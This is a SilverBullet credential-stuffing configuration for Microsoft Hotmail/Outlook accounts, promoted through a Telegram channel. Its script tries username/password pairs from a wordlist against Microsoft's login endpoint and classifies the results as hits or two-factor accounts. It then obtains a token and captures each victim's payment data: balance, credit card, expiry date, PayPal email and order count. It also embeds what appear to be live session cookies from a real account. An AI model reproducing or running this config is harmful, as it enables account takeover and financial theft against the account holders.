[SETTINGS]
{
  "Name": "Hotmail&Outlook - PSN",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2023-09-27T04:38:02.9607458+03:00",
  "AdditionalInfo": "Join Here ==> https://t.me/idfrosh_silverbullet",
  "RequiredPlugins": [],
  "Author": "@offafstore1",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Hotmail&Outlook",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#Login REQUEST POST "https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=13&rver=7.1.6819.0&wp=MBI_SSL&wreply=https:%2f%2faccount.xbox.com%2fen-us%2faccountcreation%3freturnUrl%3dhttps:%252f%252fwww.xbox.com:443%252fen-US%252f%26ru%3dhttps:%252f%252fwww.xbox.com%252fen-US%252f%26rtc%3d1&lc=1033&id=292543&aadredir=1&contextid=C61E086B741A7BC9&bk=1573475927&uaid=e94a49f177664960a3fca122edaf8a27&pid=0" 
  CONTENT "i13=0&login=<USER>&loginfmt=<USER>&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=<PASS>&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=&hpgrequestid=&PPFT=DZshWk88CvvuA9vSOHldJLurwIJH4a7uUREfu4fGCsbB2nL*YUw36i0Lz7tZDGptQxZhUTW0%21*ZM3oIUxGKEeEa1gcx%21XzBNiXpzf*U9iH68RaP3u20G0J6k2%21UdeMFc9C9uusE3IwI3gi4u7wJzyq8FCiNuk2Hly66dMuX96mSwHTYXgtZZpS%21rbS35jrsdC%21Ku4UysydsP0MXSz2klYp9KU%21hDHeKBZIu13h%21rQk9jG2vzCW4OerTedipQDJRuAg%24%24&PPSX=Passpor&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=0&i2=1&i17=0&i18=&i19=32099" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&rver=7.1.6819.0&wp=MBI_SSL&wreply=https:%2f%2faccount.xbox.com%2fen-us%2faccountcreation%3freturnUrl%3dhttps:%252f%252fwww.xbox.com:443%252fen-US%252f%26ru%3dhttps:%252f%252fwww.xbox.com%252fen-US%252f%26rtc%3d1&lc=1033&id=292543&aadredir=1" 
  HEADER "Cookie: wlidperf=FR=L&ST=1573475967016; MSPShared=1; SDIDC=CavoGthu*pkJAN8Eek6dWr5opN5x1BL2!mueAsRqcHLVS94TF9fJG7M1fnoFg6a*recSzMqgr*rslJH2ICxiqJGNoOHcIMFXc!RLunwBMWhU0x321UT4GCRmUx6DZ7AjzurT*F2lfakG55iffb2VLqMt0mhzOabJGnTjvNhmJC9g1p*grJ8oN9vhRFP1QX!nZ!fWcW27*aTbPPnlAGv9aKLWqL*MazqS52WCQ1qeFZq2cv5ZfnxVwVkgfgjdQvs2GEwfHcnTOQx1uQdtaK9OZwguM8Ck!XoiweJLLeKfFhKRZuntwAkM7ZR0uwP6Z19dR7mBTpGpy5F6!dyrkpKizd9!nzZSFFo*7poLWKhu1rNfXZj1IGgaH9sTsatt8!OJcUye6DGBEO2UgVGMYZSXh3qZLLQfoCt27U2AyIJI2kF!CwX2SD8t9RLWxmz1S3NIVWmBO8wm!DlUH1lpURHmiXbk1m!22SzIKy09LvlGae8GFkF!Rx57Ef2CKW5i5QTBtQ$$; IgnoreCAW=1; MSCC=1571654982; mkt=en-US; optimizelyEndUserId=oeu1572238927711r0.5850160263416339; uaid=e94a49f177664960a3fca122edaf8a27; MSPRequ=id=292543&lt=1573475927&co=1; OParams=11DUe2VlF3OgbQNYrRZRg3REn8KImGd*MjJ03B0XHPylHxLr2YAXrzYNH!J96HFWgoWGEdSPWFdPiET54l8VSW7HH0FPuC0Ce2pxC2uyWUloRhCunIwMUB8QUtvNr0as9T1RluKxlaF5K4LNi7CWjITDPFW2tzU!gS5LVvUdG58wfPg1itYuqY2HKQNrXN51!s!LMD8g2Gf5pcrXZibicJLoN1z5P3XSQm2UhakTdBNoDEruwv8MWbzT!5ImiwMzPP*G5APiiLE!9EKUwPT49z1!ERSbMlpzjFZP25j3o01h!9VuAllBJeaaJeclbcH9QuCwvUd2N3Z6kCiV5jlEKbyfAbHAiIJ6TNAmwU3ftHK08Fy5L6vUHSZRyocbR18FVCoP7lMVfmfQfS41VEmD3JdZTwjJIosaE7!i7E31jx5gwDqYZpo0wjnRzQlt3I9twovyRxbRxuvMVRqN7ey0AE7XI67w70kjUoRg*NbmI2BAxmuNnAdujjs4YlLsdZ8iIIFk73CkQpQ6X!MO58xB09KYImQyevehtDlrXkr*oDQCAh; MSPOK=$uuid-6b855d49-8f09-4e83-8526-b756788bf3b9$uuid-02a3151d-ba2d-4c6c-be88-c9c804ecb043" 

KEYCHECK 
  KEYCHAIN Failure AND 
    KEY "<SOURCE>" DoesNotContain ",AC:null,urlFedConvertRename" 
    KEY "incorrect account or password.\"," 
  KEYCHAIN Ban OR 
    KEY ",AC:null,urlFedConvertRename" 
  KEYCHAIN Failure OR 
    KEY "timed out" 
  KEYCHAIN Success OR 
    KEY "<COOKIES{*}>" Contains "PPAuth" 
    KEY "<COOKIES{*}>" Contains "WLSSC" 
    KEY "name=\"ANON\"" 
    KEY "sSigninName" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "account.live.com/recover?mkt" 
    KEY "recover?mkt" 
    KEY "account.live.com/identity/confirm?mkt" 
    KEY "https://account.live.com/profile/accrue?mkt=" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Email/Confirm?mkt" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/cancel?mkt=" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/Abuse?mkt=" 

#Login REQUEST POST "https://outlook.live.com/owa/0/startupdata.ashx?app=Mail&n=0" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: outlook.live.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Google Chrome\";v=\"105\", \"Not)A;Brand\";v=\"8\", \"Chromium\";v=\"105\"" 
  HEADER "x-owa-sessionid: 05bec544-7780-4f80-b286-f00245210925" 
  HEADER "x-owa-host-app: unknown" 
  HEADER "action: StartupData" 
  HEADER "ms-cv: dp/RtXOzU1W6yz/GI365tb.0" 
  HEADER "folderparams: {\"TimeZoneStr\":\"W. Central Africa Standard Time\"}" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "x-message-count: 22" 
  HEADER "x-req-source: Mail" 
  HEADER "x-owa-canary: qwOGSuoBTEiX106eUjGegFAmtFrvo9oYvj39WuuEKldHRNUi42T4uRbKwWYgRDGP9MA4BP58XH4." 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 
  HEADER "messageparams: {\"TimeZoneStr\":\"W. Central Africa Standard Time\",\"InboxReadingPanePosition\":1,\"IsFocusedInboxOn\":true,\"BootWithConversationView\":true,\"SortResults\":[{\"Path\":{\"__type\":\"PropertyUri:#Exchange\",\"FieldURI\":\"conversation:LastDeliveryOrRenewTime\"},\"Order\":\"Descending\"},{\"Path\":{\"__type\":\"PropertyUri:#Exchange\",\"FieldURI\":\"conversation:LastDeliveryTime\"},\"Order\":\"Descending\"}]}" 
  HEADER "x-owa-correlationid: 081153b5-ab3e-5465-6dbe-2063158d4016" 
  HEADER "x-js-experiment: 5" 
  HEADER "x-owa-hosted-ux: false" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://outlook.live.com" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://outlook.live.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cookie: O365Consumer=1; SuiteServiceProxyKey=9umLYPhiHW1ou15dcagwEU2USHWmAFFCWHFbw0T3SS4=&Pxp+k0oQ571fkBMe1iW9Fw==; DefaultAnchorMailbox=0003BFFD2E821606@84df9e7f-e9f6-40af-b435-aaaaaaaaaaaa; X-OWA-CANARY=qwOGSuoBTEiX106eUjGegFAmtFrvo9oYvj39WuuEKldHRNUi42T4uRbKwWYgRDGP9MA4BP58XH4.; mkt=en-US; ClientId=07DFC3DF23114BCC831214FCAE5DEA39; exchangecookie=7193f2770bde42bcab90a1ef476512a6; RpsCsrfState.lakB1A325uaoQZ3DvXrrNASZ3vkvsrtojUcbJqECNKY=8b464920-0e5b-00ae-ac4c-cc667ea74d13; domainName=; UC=0ad6a487155c471db2aa2177f7199d8c; OptInH=VTFNf5tm8eFsd2HvraOr0LXGl_FOV-mnnbPNtoTegts; OutlookSession=5b068e535395496db35af8d655c68ff3; ShCLSessionID=1664657455975_0.004489430050633292; MSFPC=GUID=f38b2ce2f467428eafc7887031bcab34&HASH=f38b&LV=202208&V=4&LU=1660330945919; MUID=1726D10012126ACA0A65C33013656B4B; wlidperf=FR=L&ST=1664657545977; mkt1=en-US; amsc=3LkUoutQxdToKMfs9DyXf+joAoBpCoOiA1G7EFE8Z6A+BtLKfpZnUTb6SH26p0lDV1L8m+0VqpikrpB5nPf5nxGNPvSubc5hs6b4xJK8PVKBTc3V63mmvAl+fhBojgMchGuZ0cFjVBotnnC36rkFCv2rBQNfApJt8rwXriR5SdbS4lTqrel0tkmB0eG8yLS2Ib4Hy7k9LJwTYf+FBP7dDHXbr1AT1iRfoPYW/GYSjfEn4ctnZy7Fe43vgRrVZzy3SGrP+NU227RtVdYym0wBxS5XGaviX/mAnwPBbMe3NgM=:2:3c; PPLState=1; MSPAuth=Disabled; MSPProf=Disabled; NAP=V=1.9&E=1b1a&C=WlDzmlD8q27RnW26SkWN_OaNi9zJaNFoABiihI6NrIUNQrdS6kxQ8w&W=2; ANON=A=B6DA332C197C94C2D7ADE406FFFFFFFF&E=1b74&W=2; WLSSC=EgA1AgMAAAAMgAAADQABHLq1NJCOAFS5Yl/kqErvE4k5vN5owKa7gQHTXWyYhkVq/wf/DKmgPJF4BN1Un1NIitaw5Q49cJwMmMqi/fDMkX+MtwWfexA9voA5FJ4XZWSDuaxfPHBuC+qjHvu4XEUpp5pKcp2uMXg7WAeNs7cvKkCKLvUGffykJy3aM0b40M+adVj+Q7QF0SFa3/B/fJEqBvNlBjAanl+UHsISAa/NWKmvrj5Cn0gzsq8St8fDTzIXYmKXlYZ7TzKyKZoWMl3wbbucbT7Wvj8igyO2EAu0vPMPFVVNLB9jaNNYl25ybL9Ad3NwA/pCGVPU0K5Vd694wG4an1Y0eQ2msuAkkojjIyQBfgAkAf2/AwAGFoIuq6g4Y4qoOGMQJwAAChCggBAbAG1vaGFtZWRzaGFmaWU1QG91dGxvb2suY29tAGIAACdtb2hhbWVkc2hhZmllNSVvdXRsb29rLmNvbUBwYXNzcG9ydC5jb20AAAAFVVMAAAAAAAAECQIAAJAYVUAABkMAB21vaGFtZWQABmtoYWxlZAAAAAAAAAAAAAAAAAAAAAAAALdhiVBhTTk4AACrqDhjik+vYwAAAAAAAAAAAAAAAA8AMTA1LjEwNC4yMDguNzAABQEAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAAAAAAAAFC4Ln4vUu/NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAA==; orgName=outlook.com; LI=1:iTLBer1N7mOJj084jmhXh6dZsbkTzajkN1M0v09DSmY%3d:H4sIAAAAAAAEAGNkYGBgZIAAViib0QDEk8rNz0jMTU0pzkhMy0w1dcgvLcnJz8/WS87PZQJKCxsY6hsa6BsZGBkpGBlYmRpZmVoygzQbsgBJlpCi0lQAH8k51lwAAAA=; RPSSecAuth=FACGARQOIsqiBiVNmgLUgB%2B8kqQxgfQu%2BA5mAAAMgAAAEDGIKDfaHIf1GBBU/h/qdE8wAccHcLeHse04xXtSUX1X4MfyQfYQjQjML79LqetolG7Mr29ngscu20kMQVxTPmb9rOj9190YkWAixgeJbHxCYqArX2ax7kduJAE4D2UTo/E5BTSDK1BApkBCc2fP8oUKMRBfjS%2BqFu/pefOOAGaTFDKaZB28oUMVlqn%2BUHCEfZu8XqC7eXuSHvBYlgcKE6v8ugsRTDNWyY0ap5iVMhhFLX9A/Pw2pdgwQF3JKUssY3uln/ZO9uO7iWv%2B82pW7NH4DmKqyo%2BVkNlWxSxbHZ1OV5QxNix1jJ1u3l6MmB3Fey2Xb3OHrk13p92BKj0BW9yRwNmPU/YpEC1DsJVOMNjtHWyPLb/gNkEa683y3fAo8eyTg3RSWz2cGeP4zbmjSPZzYCo1q%2BBGo5eKmZu0zd5dKusgAC3VfP0sa7BPar5oR1UeT5NRkkaO/RBo1DvymzCzh9dz; X-OWA-RedirectHistory=AsmKpuYB62PX7O6j2gg|AsmKpuYBj9Kere6j2gg; RoutingKeyCookie=v2:EyirRkveTecFSbY6quotBhxO50JX02uY5%2bBIGRdSgsU%3d:0003bffd-2e82-1606-0000-000000000000@outlook.com" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 0" 

#Get REQUEST GET "https://login.live.com/oauth20_authorize.srf?client_id=000000000004773A&response_type=token&scope=PIFD.Read+PIFD.Create+PIFD.Update+PIFD.Delete&redirect_uri=https%3A%2F%2Faccount.microsoft.com%2Fauth%2Fcomplete-silent-delegate-auth&state=%7B%22userId%22%3A%22bf3383c9b44aa8c9%22%2C%22scopeSet%22%3A%22pidl%22%7D&prompt=none" 
  
  HEADER "Host: login.live.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Connection: close" 
  HEADER "Referer: https://account.microsoft.com/" 

#Token PARSE "<ADDRESS>" LR "access_token=" "&token_type" -> VAR "Token" 

#urlDecode FUNCTION URLDecode "<Token>" -> VAR "urlDecode" 

#payement REQUEST GET "https://paymentinstruments.mp.microsoft.com/v6.0/users/me/paymentInstrumentsEx?status=active,removed&language=pt-BR" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Authorization: MSADELEGATE1.0=\"<Token>\"" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: paymentinstruments.mp.microsoft.com" 
  HEADER "ms-cV: FbMB+cD6byLL1mn4W/NuGH.2" 
  HEADER "Origin: https://account.microsoft.com" 
  HEADER "Referer: https://account.microsoft.com/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-GPC: 1" 

#balance PARSE "<SOURCE>" LR "balance\":" "," CreateEmpty=FALSE -> CAP "balance" "" "$" 

#Country PARSE "<SOURCE>" LR "\"country\":\"" "\"}" CreateEmpty=FALSE -> CAP "Country" 

#Payment_Method PARSE "<SOURCE>" LR "paymentMethodFamily\":\"credit_card\",\"display\":{\"name\":\"" "\",\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Payment Method" 

#Expiry_Year PARSE "<SOURCE>" LR "\"expiryYear\":\"" "\"," -> VAR "Expiry Year" 

#Expiry_Month PARSE "<SOURCE>" LR "\"expiryMonth\":\"" "\",\"" -> VAR "Expiry Month" 

FUNCTION Constant "<Expiry Year>/<Expiry Month>" -> CAP "Expiry Card Date" 

#paypal PARSE "<SOURCE>" LR ",\"email\":\"" "\",\"billingAgreementType" CreateEmpty=FALSE -> CAP "PAYPAL Email" 

#Country PARSE "<SOURCE>" LR "PrefCountry: " ", Lang" CreateEmpty=FALSE -> CAP "Country" "|" "|" 

#pay REQUEST GET "https://paymentinstruments.mp.microsoft.com/v6.0/users/me/paymentTransactions" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Authorization: MSADELEGATE1.0=\"<Token>\"" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: paymentinstruments.mp.microsoft.com" 
  HEADER "ms-cV: FbMB+cD6byLL1mn4W/NuGH.2" 
  HEADER "Origin: https://account.microsoft.com" 
  HEADER "Referer: https://account.microsoft.com/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-GPC: 1" 

#Orders PARSE "<SOURCE>" LR "orders\":[" "]" -> VAR "Orders" 

FUNCTION CountOccurrences "orderId" "<Orders>" -> CAP "Total Orders" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" AND 
    KEY "<Payment Method>" EqualTo "" 
    KEY "<PAYPAL Email>" EqualTo "" 
    KEY "<Orders>" Contains "[]" 

